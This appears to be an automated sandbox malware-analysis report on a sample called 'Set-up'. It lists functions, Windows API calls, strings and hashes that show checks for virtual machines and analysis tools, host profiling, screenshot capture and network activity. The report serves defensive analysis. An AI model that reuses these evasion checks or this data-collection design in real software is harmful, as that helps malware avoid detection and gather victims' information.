Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: strstr$Process32$First$CloseCreateHandleNextSnapshotToolhelp32$CharEnumFileFindFullImageNameOpenProcessQueryUpperWindowsstrncpy
String ID: 0$C:\USERS\PUBLIC\$C:\Windows\System32\VBox*.dll$SYSTEM\ControlSet001\Services\VBoxSF$WINDBG.EXE$dbg$dbg_sec$dbg_third$ida.exe$procmon.exe$public_check$vbox_first$vbox_second$wireshark.exe$x64dbg.exe$yadro
API String ID: 515599682-3783588604
Opcode ID: 56428874004b4fe8be8398aefacdeda0798c4272a71bf9570726f8ced7025580
Instruction ID: 897ce2d4572b9d5d5e01865e8c5fa9c47d19f6b37557da519e734ec9c2d857a6
Opcode Fuzzy Hash: 56428874004b4fe8be8398aefacdeda0798c4272a71bf9570726f8ced7025580
Instruction Fuzzy Hash: D9E1F3B09057099FDB10EF68DA8579DBBF4AF48304F008869E888DB345E779D988DF52

Function 00A6255D Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 282
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNELBASE ref: 00A62579

Part of subcall function 00F3E330: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00A62589), ref: 00F3E345

GlobalMemoryStatusEx.KERNELBASE ref: 00A625CC
GetLogicalDriveStringsA.KERNEL32 ref: 00A62619
GetDriveTypeA.KERNELBASE ref: 00A62647
GetDiskFreeSpaceExA.KERNELBASE ref: 00A6267E
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00A62749
KiUserCallbackDispatcher.NTDLL ref: 00A627E2
SHGetKnownFolderPath.SHELL32 ref: 00A6286D
wcscpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00A628BE
wcscat.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00A628D4
FindFirstFileW.KERNELBASE ref: 00A628F8
FindNextFileW.KERNELBASE ref: 00A6291F
K32EnumProcesses.KERNEL32 ref: 00A6296F

Strings

name, xrefs: 00A626A2
Num_processor, xrefs: 00A6258D
all, xrefs: 00A626E0
free, xrefs: 00A6271E
@, xrefs: 00A625B4
drivers, xrefs: 00A62769
`, xrefs: 00A629BC
uptime_minutes, xrefs: 00A629E4
resolution_y, xrefs: 00A6282F
Num_displays, xrefs: 00A627C3
resolution_x, xrefs: 00A6280D
processes, xrefs: 00A62996
recent_files, xrefs: 00A62941
Num_ram, xrefs: 00A625F0

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: DriveFileFind$CallbackDiskDispatcherEnumFirstFolderFreeGlobalInfoKnownLogicalMemoryNextPathProcessesSpaceStatusStringsSystemTypeUsermallocstrlenwcscatwcscpy
String ID: @$Num_displays$Num_processor$Num_ram$`$all$drivers$free$name$processes$recent_files$resolution_x$resolution_y$uptime_minutes
API String ID: 2116500361-3337672980
Opcode ID: 4a2092e1115e08b1b7ff66f36514571b3fe129c925801a8848330904d4a0cc20
Instruction ID: 2e09e3060074aad7a77a6e02bfc3efdb2a94453af739837f9fa6388c0d919fce
Opcode Fuzzy Hash: 4a2092e1115e08b1b7ff66f36514571b3fe129c925801a8848330904d4a0cc20
Instruction Fuzzy Hash: 12D1C3B49057099FCB10EF68D98569EBBF0BF48314F00896DE498D7341E7359A84DF52

Function 00DF8D9A Relevance: 45.6, APIs: 16, Strings: 10, Instructions: 134
filelibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 00DF8DDF
GetProcAddress.KERNEL32 ref: 00DF8E03
GetProcAddress.KERNEL32 ref: 00DF8E19
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00DF8FFF
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00DF9020
FreeLibrary.KERNEL32 ref: 00DF9028

Part of subcall function 00DF7E20: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00DF7E6D
Part of subcall function 00DF7E20: wcscmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00DF7EB6
Part of subcall function 00DF7E20: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00DF7ED8

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00DF90A7
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00DF90C8
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00DF90DF
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00DF9100
FreeLibrary.KERNEL32 ref: 00DF9108
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00DF9127
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00DF9148
FreeLibrary.KERNEL32 ref: 00DF9150

Strings

image/jpeg, xrefs: 00DF8E64
Failed to allocate buffer, xrefs: 00DF9248
GdipSaveImageToStream, xrefs: 00DF8E0E
gdiplus.dll, xrefs: 00DF8DD8
Failed to get JPEG encoder CLSID, xrefs: 00DF9141
Failed to load GDI+ functions, xrefs: 00DF90F9
GdipCreateBitmapFromHBITMAP, xrefs: 00DF8DF8
Failed to create GDI+ bitmap, xrefs: 00DF9019
Failed to load gdiplus.dll, xrefs: 00DF90C1
!, xrefs: 00DF912D

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: Library__acrt_iob_funcfwrite$Free$AddressProc$Loadfreemallocwcscmp
String ID: !$Failed to allocate buffer$Failed to create GDI+ bitmap$Failed to get JPEG encoder CLSID$Failed to load GDI+ functions$Failed to load gdiplus.dll$GdipCreateBitmapFromHBITMAP$GdipSaveImageToStream$gdiplus.dll$image/jpeg
API String ID: 4185073593-1943330374
Opcode ID: 56f1c275b2eb5904c1bbb0cd2e6b5931f93f38980fe6ab3931b4f65dfb42de54
Instruction ID: 7366b0e25bc3af25cf6ab88663e03fa14100cdd0da2fbbc003bc16005a97cbe0
Opcode Fuzzy Hash: 56f1c275b2eb5904c1bbb0cd2e6b5931f93f38980fe6ab3931b4f65dfb42de54
Instruction Fuzzy Hash: FB5116B08093089FD710AF29D44936EBBF0FF45314F11886DE9C89B246DB7A9885DF62

Function 00B2AA30 Relevance: 19.9, APIs: 13, Instructions: 364
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

htons.WS2_32(?), ref: 00B2AAE8
htons.WS2_32(?), ref: 00B2AB33
socket.WS2_32(FFFFFFFF,?,00000000), ref: 00B2AB9A
ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00B2ABE3
setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 00B2AC02
setsockopt.WS2_32(?,0000FFFF,00001002,00000000,00000004), ref: 00B2AC29
htonl.WS2_32(00000000), ref: 00B2AC69
bind.WS2_32(?,00000017,0000001C), ref: 00B2ACCF
setsockopt.WS2_32(?,00000029,0000001B,0000001C,00000004), ref: 00B2ACFE
setsockopt.WS2_32(?,00000006,00000001,0000001C,00000004), ref: 00B2AD20
WSAGetLastError.WS2_32 ref: 00B2ADB5
closesocket.WS2_32(?), ref: 00B2AE6F

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: setsockopt$htons$ErrorLastbindclosesockethtonlioctlsocketsocket
String ID:
API String ID: 4039825230-0
Opcode ID: 6dba0d8dc828f5f52fac91b853a2ec1b9d38333cef15799408af9be2c5eb1bc2
Instruction ID: 3762e06595c25df223abb8158c6e06e268e397b6952a98a16ff43685a045c009
Opcode Fuzzy Hash: 6dba0d8dc828f5f52fac91b853a2ec1b9d38333cef15799408af9be2c5eb1bc2
Instruction Fuzzy Hash: 5EE1DF706003119FEB20DF24E885B6AB7E5FF88310F144A6CF99D9B291D775E845CB92

Function 00A6116C Relevance: 19.7, APIs: 13, Instructions: 200
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 00A611B7
SetUnhandledExceptionFilter.KERNEL32 ref: 00A61238
_set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A6124D
__p__acmdln.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A61261
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00A612EB
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00A61323
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00A6132E
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00A61344
GetStartupInfoA.KERNEL32 ref: 00A61433

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdln_set_invalid_parameter_handlermemcpystrlen
String ID:
API String ID: 3873122205-0
Opcode ID: 035f91d6c525616a9aafa289408d00c5562ea016eefde407ab4501c6d760e707
Instruction ID: df948e15d87db4366d08725c3ed760801a72c15934ccd9986af9b844f57220c9
Opcode Fuzzy Hash: 035f91d6c525616a9aafa289408d00c5562ea016eefde407ab4501c6d760e707
Instruction Fuzzy Hash: C281CDB1904345CFDB20EF66D4853AABFF0FB45300F18492CE9899B345DB3AA844DBA1

Function 00DE8E90 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_open.MSVCRT ref: 00DE8EAD
_exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00DE8EFA
_write.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00DE8F4A
_close.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00DE8F59

Strings

CONOUT$, xrefs: 00DE8EA6
@, xrefs: 00F46A41
terminated, xrefs: 00DE8F20

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _close_exit_open_write
String ID: terminated$@$CONOUT$
API String ID: 28676597-491099378
Opcode ID: 4c2c2e45225a33993be3506e050377ac340b9f7bbc4a739da77872d8c87391c1
Instruction ID: 8fb3e695837739814c19f60a5285443ddf083fb4e188bb7ca3a9122997872dbc
Opcode Fuzzy Hash: 4c2c2e45225a33993be3506e050377ac340b9f7bbc4a739da77872d8c87391c1
Instruction Fuzzy Hash: 494145B09083458FCB10EF79C44566EBBF0BF48714F048A2DE899D7240EB39C845DB66

Function 00F3C070 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

error CryptGenRandom 0x%08lx, xrefs: 00F3C1E9

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID:
String ID: error CryptGenRandom 0x%08lx
API String ID: 0-1222942552
Opcode ID: 182e204e55165b15b438c3ba3b095e8e603e008757f868be3c714021ec8dceb0
Instruction ID: 973eaed2c0f545cf0da9bb9220692e9d75966a9c544d1e0213550d7bf6b5f2eb
Opcode Fuzzy Hash: 182e204e55165b15b438c3ba3b095e8e603e008757f868be3c714021ec8dceb0
Instruction Fuzzy Hash: E941C2B59093419FC700EF78C58A61ABBE0BB88324F408A2DE8C9C7354EB79D545DF92

Function 00A705B0 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 369
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAEventSelect.WS2_32(?,8508C483,?), ref: 00A70711
getsockopt.WS2_32(?,0000FFFF,00001008,?,00000004), ref: 00A70783
WSAWaitForMultipleEvents.WS2_32(00000001,00A63EBE,00000000,00000000,00000000), ref: 00A7086F
WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 00A708EF
WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 00A70934
WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 00A709DC
WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 00A709FB
WSAResetEvent.WS2_32(8508C483), ref: 00A70A1F

Strings

multi.c, xrefs: 00A707B2

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: Event$EventsSelect$EnumNetwork$MultipleResetWaitgetsockopt
String ID: multi.c
API String ID: 3264668090-214371023
Opcode ID: e58075a2cd3eb28331a788edc63a9df11cc62179ee85725016a27ec0e53ef1e7
Instruction ID: 806f389251b8dbccfe63d17bb6a7068b02a11a00f9ac7fe40e5fcfc3c8d5b901
Opcode Fuzzy Hash: e58075a2cd3eb28331a788edc63a9df11cc62179ee85725016a27ec0e53ef1e7
Instruction Fuzzy Hash: 49D19A71608301DFE710DF24DD81BABBBE9BB94348F04C82CF98986252E775E944CB52

Function 00A76FA0 Relevance: 13.8, APIs: 9, Instructions: 255sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?), ref: 00A77010

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 879cba4e2c886749113cb35436a44a741d2879e4a93db3eda7750a977e32c941
Instruction ID: 10b3e61a1053f0265db4dfc21436dc8f742a31fb6055d908a564a9345980e51a
Opcode Fuzzy Hash: 879cba4e2c886749113cb35436a44a741d2879e4a93db3eda7750a977e32c941
Instruction Fuzzy Hash: D491DD306083498BD7359B298C84BBEB2E5FF84360F14CB2CE8AD861E5EB759C41D691

Function 00A611A3 Relevance: 12.1, APIs: 8, Instructions: 115sleepstringCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 00A611B7
SetUnhandledExceptionFilter.KERNEL32 ref: 00A61238
_set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A6124D
__p__acmdln.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A61261
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00A612EB
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00A61323
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00A6132E
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00A61344
_initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A6140C

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: malloc$ExceptionFilterSleepUnhandled__p__acmdln_initterm_set_invalid_parameter_handlermemcpystrlen
String ID:
API String ID: 1209083157-0
Opcode ID: 79b13d4ad7231d843d04333387a740eb65b2fc1aed8b6e807683d538d15cab9c
Instruction ID: fe9b89ba407b91f303f5593c2116105d3ceab6afa0b839c730d712d67315bacf
Opcode Fuzzy Hash: 79b13d4ad7231d843d04333387a740eb65b2fc1aed8b6e807683d538d15cab9c
Instruction Fuzzy Hash: EB417BB0A05305CFDB20EF66E48535DBBF0FB48300F08492DE8899B345DB7AA844DBA1

Function 00A613C9 Relevance: 12.1, APIs: 8, Instructions: 109stringCOMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00A61238
_set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A6124D
__p__acmdln.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A61261
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00A612EB
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00A61323
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00A6132E
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00A61344

Part of subcall function 00DE8A20: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,00A613EF), ref: 00DE8A2A

_initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A6140C

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
